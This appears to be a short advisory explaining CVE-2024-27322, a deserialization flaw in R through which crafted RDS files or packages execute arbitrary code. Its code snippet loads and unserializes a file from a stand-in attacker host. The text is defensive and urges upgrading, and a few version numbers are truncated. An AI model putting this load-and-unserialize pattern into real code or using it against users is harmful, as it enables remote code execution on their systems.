The open-source R programming language has become one of the most popular statistical software suites in the world for applications in data science, analytics, and visualization. With millions of users across industry and academia, R has flourished due to its extensive package ecosystem and vibrant community support. Unfortunately, this widespread success means that potential security vulnerabilities within R's core codebase could have severe consequences on a global scale.

Recently, a critical issue was discovered and consequently assigned the Common Vulnerabilities and Exposures (CVE) identifier of CVE-2024-27322. This vulnerability is caused by a deserialization flaw that permits malicious RDS (R Data Serialization) files or R packages to execute arbitrary code on an end user's system when interacted with. The vulnerability affects all R versions starting from 1.4. up to but not including 4.4..

In this detailed analysis, we will explore the specifics of CVE-2024-27322, including a code snippet demonstrating the vulnerability, links to original references, and details about how the exploit works. By understanding the impact of this vulnerability, R users worldwide can be empowered to take the necessary steps to mitigate its damaging effects.

Code Snippet

The following code snippet reveals how arbitrary code execution can occur during deserialization of untrusted data in R:

# Load a maliciously crafted RDS file from an attacker-controlled server
malicious_rds <- url("https://attacker.example.com/malicious.rds";, "rb")
data <- unserialize(malicious_rds)

In this scenario, when the data object is deserialized using the unserialize function, it can trigger arbitrary code execution contained within the malicious RDS file, potentially creating an opportunity for an attacker to compromise the host system.

Original References

To better understand the nature and severity of CVE-2024-27322, please refer to the following original references discussing this issue:

1. CVE-2024-27322 on the Common Vulnerabilities and Exposures database
2. Announcement of the security issue in R
3. R Mailing List discussion about the vulnerability

Exploit Details

The core problem behind the deserialization vulnerability lies in R's handling of untrusted data during the deserialization process. By design, R's deserialization functionality allows for the execution of functions and arbitrary code; this is a powerful feature that provides the foundation for the R package system. However, when interacting with untrusted data (for example, RDS files from unauthorized sources), this feature presents a critical security issue.

An attacker can exploit this vulnerability by crafting a malicious RDS file with custom, serialized R objects designed to springboard malicious code execution. Once these objects are deserialized by the vulnerable unserialize function, the hostile code is executed, providing the attacker with control over the user's system.

Conclusion and Mitigation

CVE-2024-27322 is a critical deserialization vulnerability that endangers a massive number of R users around the globe. Thankfully, the issue has already been addressed in R version 4.4. and later. Users are strongly recommended to upgrade to the latest version of R immediately to protect themselves against this potentially devastating exploit.

Most importantly, users should remain vigilant while dealing with untrusted data sources and maintain a cautious approach when importing RDS files or R packages from unauthorized sources. Always verify the credibility of external repositories and packages to minimize exposure to potentially harmful code. In conclusion, stay informed, stay updated, and stay safe in the world of R programming.


Published on: 04/29/2024 13:15:30 UTC
Last modified on: 06/10/2024 18:15:28 UTC